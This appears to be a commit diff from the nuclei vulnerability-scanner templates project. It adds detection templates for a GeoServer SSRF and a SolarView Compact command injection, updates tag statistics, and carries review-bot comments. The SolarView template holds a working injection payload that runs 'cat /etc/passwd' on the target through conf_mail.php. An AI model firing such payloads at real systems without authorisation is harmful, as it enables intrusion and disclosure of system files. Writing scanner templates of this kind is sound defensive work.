sullo 2022-05-18 16:56:31 -04:00
commit 64a691dbfa
10 changed files with 1665 additions and 1546 deletions


@ -3,12 +3,14 @@ cves/2018/CVE-2018-17422.yaml
cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20123.yaml
cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-20124.yaml
cves/2021/CVE-2021-25075.yaml cves/2021/CVE-2021-25075.yaml
cves/2021/CVE-2021-40822.yaml
cves/2021/CVE-2021-46379.yaml cves/2021/CVE-2021-46379.yaml
cves/2021/CVE-2021-46422.yaml cves/2021/CVE-2021-46422.yaml
cves/2021/CVE-2021-46424.yaml cves/2021/CVE-2021-46424.yaml
cves/2022/CVE-2022-1392.yaml cves/2022/CVE-2022-1392.yaml
cves/2022/CVE-2022-1598.yaml cves/2022/CVE-2022-1598.yaml
cves/2022/CVE-2022-21705.yaml cves/2022/CVE-2022-21705.yaml
cves/2022/CVE-2022-29303.yaml
cves/2022/CVE-2022-30489.yaml cves/2022/CVE-2022-30489.yaml
default-logins/octobercms-default-login.yaml default-logins/octobercms-default-login.yaml
exposed-panels/solarview-compact-panel.yaml exposed-panels/solarview-compact-panel.yaml
@ -17,5 +19,6 @@ misconfiguration/oracle-ebusiness-registration-enabled.yaml
misconfiguration/unauth-wavink-panel.yaml misconfiguration/unauth-wavink-panel.yaml
misconfiguration/xss-deprecated-header.yaml misconfiguration/xss-deprecated-header.yaml
technologies/kubernetes-operational-view-detect.yaml technologies/kubernetes-operational-view-detect.yaml
token-spray/api-chaos.yaml
vulnerabilities/wordpress/seo-redirection-xss.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml
workflows/yonyou-nc-workflow.yaml workflows/yonyou-nc-workflow.yaml


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | | cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | | panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | | lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | | xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | | wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | | rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | | exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | | cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | | tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | | wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
**261 directories, 3543 files**. **262 directories, 3566 files**.
</td> </td>
</tr> </tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | | cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | | panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | | lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | | xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | | wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | | rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | | exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | | cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | | tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | | wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |


@ -0,0 +1,45 @@
id: CVE-2021-40822
info:
name: Geoserver - SSRF
author: For3stCo1d
severity: high
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.
reference:
- https://gccybermonks.com/posts/cve-2021-40822/
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
- https://github.com/geoserver/geoserver/releases
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-40822
cwe-id: CWE-918
metadata:
fofa-query: app="GeoServer"
verified: "true"
tags: cve2021,ssrf,geoserver,cve
requests:
- raw:
- |
POST /geoserver/TestWfsPost HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
words:
- "<html><head></head><body>"
- type: status
status:
- 200
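Review bot: The info block carries no `remediation:` entry although the fixed release is already on the page (the `2.19.2...2.19.3` compare link in reference), so a hit tells the operator nothing about the next step; add `remediation: Upgrade to GeoServer 2.19.3 or a later release containing the proxy-host fix.` under `info`. The body-fragment matcher (`<html><head></head><body>`) and the status-200 matcher are joined to the interactsh check by `matchers-condition: and`, so a host that does make the outbound request but serves a slightly different TestWfsPost page or status is reported as not vulnerable; the out-of-band hit is the evidence of SSRF, so consider relying on the `interactsh_protocol` matcher (optionally narrowed with `part: interactsh_request` on the `/geoserver/../` path seen in the request) and recording in a comment why the extra matchers are kept if they are. The rendered page has dropped indentation and the blank line between headers and body, so the nesting of `matchers` under the `raw` request cannot be verified from here.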


@ -2,7 +2,7 @@ id: CVE-2021-46422
info: info:
name: SDT-CW3B1 1.1.0 - OS Command Injection name: SDT-CW3B1 1.1.0 - OS Command Injection
author: remote author: badboycxcc
severity: critical severity: critical
description: | description: |
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.


@ -0,0 +1,34 @@
id: CVE-2022-29303
info:
name: SolarView Compact 6.0 - OS Command Injection
author: badboycxcc
severity: high
description: |
SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
reference:
- https://www.exploit-db.com/exploits/50940
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
- https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing
metadata:
shodan-query: http.html:"SolarView Compact"
verified: "true"
tags: cve,cve2022,rce,injection
variables:
cmd: "cat${IFS}/etc/passwd"
requests:
- raw:
- |
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
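Review bot: The info block lacks the `classification:` stanza that the other new template in this commit (CVE-2021-40822) carries, so the CVE and CWE ids exist only in the file name and tags; add `classification:` with `cve-id: CVE-2022-29303` and `cwe-id: CWE-78` and fill the `cvss-metrics`/`cvss-score` fields from the NVD record rather than leaving severity unexplained. The third reference is a personal Google Drive folder, which is neither authoritative nor durable and can change content at any time; keep the Exploit-DB and MITRE links and drop or replace the Drive link with the vendor advisory. Because the `cmd` variable is executed on the target (it reads `/etc/passwd`) rather than being a harmless probe, a one-line comment above `variables:` stating that the check is intrusive would help operators decide when to run it; the name says `6.0` while the description says `ver.6.00`, so align the two.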


@ -16,7 +16,9 @@ headless:
name: extract name: extract
args: args:
code: | code: |
'\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n' () => {
return '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
}
extractors: extractors:
- type: kval - type: kval
part: extract part: extract
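Review bot: The new arrow function still reads `i.url`, but standard DOM elements do not expose a `url` property for the `url` attribute that the `[url]` selector matches, so those elements yield `undefined` and the `join` turns them into empty lines in the extracted output; change the map to `.map(i => i.src || i.href || i.getAttribute('url') || i.action)` (or read all four with `getAttribute` if the raw attribute values are what the extractor should report). The enclosing `headless:` block starts before the hunk and the `extractors` stanza continues after it, so whether `extract` is consumed elsewhere cannot be checked here.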


@ -0,0 +1,25 @@
id: api-chaos
info:
name: Chaos API Test
author: 0ri2N
severity: info
reference:
- https://chaos.projectdiscovery.io/#/docs
tags: dns,recon,chaos,token-spray,projectdiscovery
self-contained: true
requests:
- method: GET
path:
- "https://dns.projectdiscovery.io/dns/projectdiscovery.io"
headers:
Authorization: "{{token}}"
matchers:
- type: word
part: body
words:
- '"domain":'
- '"subdomains":'
condition: and
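Review bot: The info block has no `description:`, so an operator seeing a match is not told that it means the supplied Chaos API key is live and was transmitted to a third-party endpoint; add `description: Checks whether a ProjectDiscovery Chaos API key is valid by querying the subdomain endpoint; a match means the key is active.` under `info`. `self-contained: true` together with the fixed `path` entry is the right shape for a token-spray template because it keeps the secret from being sent to scan targets, which is worth stating in a comment above `self-contained` so later edits do not remove it. The body-word matcher alone is adequate, but pairing it with a `type: status` matcher for `200` would make a non-JSON error page that happens to echo the words less likely to count as a valid key.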